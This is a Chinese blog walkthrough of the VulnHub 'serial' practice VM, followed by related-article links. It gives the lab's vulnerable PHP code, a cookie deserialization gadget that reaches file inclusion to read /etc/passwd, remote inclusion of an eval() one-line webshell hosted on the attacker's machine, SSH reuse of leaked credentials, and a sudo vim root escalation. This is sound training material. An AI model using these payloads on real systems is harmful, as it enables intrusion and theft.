反序列化漏洞vulhub靶场serial

最新推荐文章于 2024-05-04 21:00:00 发布
最新推荐文章于 2024-05-04 21:00:00 发布
阅读量411 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjc1517/article/details/131822565
版权

靶场搭建

https://download.vulnhub.com/serial/serial.zip
下载后解压,打开VMWare,新建虚拟机,选择系定义配置
在这里插入图片描述
兼容性默认即可,选择稍后安装操作系统
在这里插入图片描述
操作系统Linux,版本Ubuntu64位
在这里插入图片描述
其他配置默认即可,选择使用现有虚拟磁盘,文件为开头解压得到的serial.vmdk
在这里插入图片描述
在这里插入图片描述

渗透测试

信息收集

打开靶机,在kali虚拟机中进行主机存活探测
sudo arp-scan -l
在这里插入图片描述
分析一下,可知靶机IP地址位192.168.74.140

端口扫描

nmap -p- 192.168.74.140 --min-rate=10000(以最小速率10000扫描)
在这里插入图片描述

目录扫描

dirsearch -u http://192.168.74.140/
在这里插入图片描述
尝试访问结果中可以访问的目录
在这里插入图片描述

在backup目录下发现bak.zip文件,下载下来

在这里插入图片描述

漏洞扫描

分析文件
index.php

<?php
	include("user.class.php");

	if(!isset($_COOKIE['user'])) {
		setcookie("user", base64_encode(serialize(new User('sk4'))));
	} else {
		unserialize(base64_decode($_COOKIE['user']));
	}
	echo "This is a beta test for new cookie handler\n";
?>

log.class.php

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

user.class.php

<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

发现三个文件有包含的关系,放到同一文件中分析

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }


  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }


	if(!isset($_COOKIE['user'])) {
		setcookie("user", base64_encode(serialize(new User('sk4'))));
	} else {
		unserialize(base64_decode($_COOKIE['user']));
	}
	echo "This is a beta test for new cookie handler\n";
?>

发现有三个类,如果用户没有COOKIE,就给用户生成一个名为sk4的COOKIE,否则将用户的COOKIE反序列化;
COOKIE的值为对User对象的序列化结果进行Base64位编码后的结果;
User类中有两个魔法方法,分别为创建和销毁时调用
我们代理抓包,进入repeater模块
在这里插入图片描述
尝试将COOKIE删除,相应包中带来了COOKIE,用户名为sk4
在这里插入图片描述
将COOKIE撤销回去

尝试更改 COOKIE

选中COOKIE,在burp的解码器中可以看出这里的cookie经过了URL编码,将%3D改成=在这里插入图片描述
再次选中COOKIE,将解码方式改为Base64,可以看出结果为User类的序列化结果
在这里插入图片描述
进行Base64解码,修改用户名及其长度

在这里插入图片描述
将其进行base64位编码后发送,可以看到响应包中用户名发生了变化
在这里插入图片描述

漏洞利用

漏洞存在,思考利用

继续分析代码,发现Wel实例销毁时调用了公共方法hadler,而hadler方法不止在Welcome类中有,在Log类中不仅存在hadler方法,还存在文件包含,所以替换COOKIE中的Welocome实例
由于目标系统为Linux,所以文件包含passwd
在这里插入图片描述
注意这里输入的空格要改为00,选中空格后在右侧改为00,点击保存
在这里插入图片描述
进行Base64编码后发送
在这里插入图片描述发现passwd文件显示了出来

尝试远程文件包含

开启Windows系统的服务器,根目录下创建一个1.txt文件

<?php
phpinfo();
?>

更改COOKIE,这里我的windowsIP为192.168.74.1

在这里插入图片描述
Base64编码后发送,没有响应,是个好现象,说明文件包含成功
关闭windows防火墙后重新发送

在这里插入图片描述
文件包含成功,看不懂可以渲染一下

在这里插入图片描述
将1.txt改为一句话木马

<?php
@eval($_POST['cmd']);
?>
打开蚁剑连接将Cookie放入Http头中

在这里插入图片描述
在这里插入图片描述
测试连接,连接成功
在这里插入图片描述
浏览目录,发现根目录下有credentials.txt.bak文件
在这里插入图片描述
应该是sk4用户的密码,由于22端口开启,尝试远程连接
ssh sk4@192.168.74.143
在这里插入图片描述
登陆成功,依旧浏览目录,发现flag
在这里插入图片描述
ls -la
在这里插入图片描述
寻找有用的文件,发现.sudo_as_admin_successful,sudo -l查看当前用户在sudo配置中被授权执行的命令列表。
在这里插入图片描述
发现sudo vim在当前环境下不需要密码

权限提升

进入vim,命令模式中调取bash环境
在这里插入图片描述

发现已获取root权限

在这里插入图片描述

flag已全部找到

拇指与迷失
关注
Vulhub靶场Dubbo Java反序列化漏洞复现
X_python321的博客
08-03 271
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架
serial靶场
最新发布
m0_74214882的博客
08-06 668
user.class.php文件包含log.class.php文件且定义了Welcome和User两个类并调用了log.class.php文件中的handler函数。index.php文件中包含user.class.php文件且对cookie中的user参数进行了序列化和base64编码。log.class.php定义了Log类和成员变量type_log且handler函数对变量进行了文件包含和输出。///可以写在任意目录下,要ip+地址/1.php。查看一下80端口和22端口。没有得到太多有用信息。
PiKachu靶场之PHP反序列化漏洞
angry_program的博客
02-22 2008
前言 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize(...
vulnhub靶场serial-php渗透
问彡心的博客
07-31 1402
整个渗透过程中主要漏洞在于反序列化的利用配合远程文件包含,将wel的对象替换,由于恰好Log对象中存在handler函数且有文件包含,才能进行利用,我把这招称之为"偷梁换柱",还是很形象的,当执行一句话木马时,离成功也就不远了,随之从反弹终端中得到的账户密码进行远程登陆,在执行命令过程中通过提示发现了sudo下的vim是可以直接执行的,在vim命令行中有!command暂时离开vim到指令列模式下执行command的显示结果,利用此功能成功借用了bash来执行输入的命令httpshttps。...
php反序列化靶机serial实战
zzgslh的博客
04-07 1267
靶机描述 今天研究一下php反序列化,靶机serial实战。目标为获取root权限。 靶机信息 可以去vulhub上下载此靶机: https://www.vulnhub.com/entry/serial-1,349/ 下载好,之后,使用Vmware新建虚拟机打开,步骤如下: 1.首先创建新的虚拟机。 2.然后选择客户机版本为Ubuntu 64位。 3.然后选择使用现有磁盘,选择下载的...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
反序列化漏洞原理和靶场实践
09-26
反序列化漏洞原理和靶场实践 序列化和反序列化是 PHP 中两个基本概念。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,而反序列化是将存储的状态信息重新转换为对象的过程。 序列化的过程可以将对象...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
小白看得懂的MySQL JDBC 反序列化漏洞分析 - 先知社区1
08-03
【MySQL JDBC 反序列化漏洞分析】 MySQL JDBC 反序列化漏洞主要涉及到Java数据库连接(JDBC)驱动程序中的安全问题。JDBC是Java中用于与数据库交互的标准接口,允许开发者使用Java语言执行SQL语句。在特定版本的...
serial.zip
05-29
有2010实现了串口定时通信和UDP定时发送数据。其中UDP接收数据也利用了线程来实现。
记录一次vulhub:Weblogic反序列化漏洞复现(CVE-2017-10271)
sszsNo1的博客
06-26 179
复现vulhub:Weblogic反序列化漏洞复现(CVE-2017-10271)
【甄选靶场Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3403
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
vulhub靶场】Tomcat中间件漏洞复现
M372109150的博客
05-04 2281
本文主要是对tomcat中间件相关漏洞的复现,包括Tomcat AJP 任意文件读取/包含漏洞 (CVE-2020-1938)、Tomcat 任意文件写入漏洞 (CVE-2017-12615)以及Tomcat 弱密码和后端 Getshell 漏洞
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 4136
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
linux学习笔记--常见命令
啦啦啦啦啦啦
10-17 264
linux学习笔记linux命令命令格式查看帮助文档自动补全查看历史命令文件磁盘相关命令 linux命令 命令格式 linux命令格式为: 命令 [ 选项 ] [参数] []代表可选 查看帮助文档 help 可以使用help命令查看帮助文档 例如: ls --help 或者ls -help man manual 手册,是linux提供的一个手册,包含了大多数命令 可以使用 man 命令来查...
取消Ubuntu终端提示
weixin_44675684的博客
01-29 270
取消Ubuntu终端提示:To run a command as administrator (user root) use sudo command See man sudo_root。
全程带阻:记一次授权网络攻防演练(下)
bylfsj的博客
10-19 946
*本文作者:yangyangwithgnu,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。 在一次漏洞赏金活动中,挖掘到一个不标准的命令注入漏洞,我无法用命令分隔符、命令替换符注入新命令让系统执行,所以,从”型态”上讲,它不算是命令注入漏洞;但我又可以借助目标环境让载荷到达系统命令行,实现读写文件、执行新命令,所以,”神态”来看,...
fastjson反序列化漏洞复现vulhub
06-01
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson反序列化漏洞的复现步骤: 1. 下载并启动vulhub: ``` git clone https://github.com/vulhub/vulhub.git cd vulhub/fastjson/1.2.24_rce/ docker-compose ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

拇指与迷失

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值